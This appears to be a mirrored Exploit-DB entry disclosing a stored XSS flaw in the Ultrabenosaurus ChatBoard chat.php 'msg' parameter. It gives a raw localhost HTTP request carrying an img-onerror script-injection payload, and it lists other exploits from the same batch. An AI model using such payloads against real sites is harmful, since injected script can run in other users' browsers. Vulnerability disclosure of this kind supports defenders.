bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/39948.txt
Offensive Security 33dd246d8a DB: 2016-06-16 
14 new exploits

Ultrabenosaurus ChatBoard - Stored XSS
Ultrabenosaurus ChatBoard - CSRF (Send Message)
w2wiki - Multiple XSS Vulnerabilities
Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities
Dokeos 2.2.1 - Blind SQL Injection
Joomla En Masse (com_enmasse) Component 5.1 - 6.4 - SQL Injection
AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation
BookingWizz Booking System < 5.5 - Multiple Vulnerabilities
jbFileManager - Directory Traversal
PHPLive 4.4.8 - 4.5.4 - Password Recovery SQL Injection
Bomgar Remote Support Unauthenticated Code Execution (msf)
Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)
Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)
Google Chrome - GPU Process MailboxManagerImpl Double-Read
2016-06-16 05:02:53 +00:00

28 lines
969 B
Text
Executable file
Raw Blame History

# Exploit Title: Ultrabenosaurus ChatBoard - Stored XSS
# Date: 2016-06-14
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ultrabenosaurus.ninja/
# Software Link: https://github.com/Ultrabenosaurus/ChatBoard/archive/master.zip
# Tested on: Debian [wheezy]
### Vulnerability Point
chat.php is not filtering special character
-> file: ./chat.php
-> param: msg
### Vulnerability Code
POST /vul_test/ChatBoard/__original/chat.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/vul_test/ChatBoard/__original/?chat
Content-Length: 10
Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5
Connection: keep-alive
msg=654<img src="z" onerror=zz>asd
Reference in a new issue View git blame Copy permalink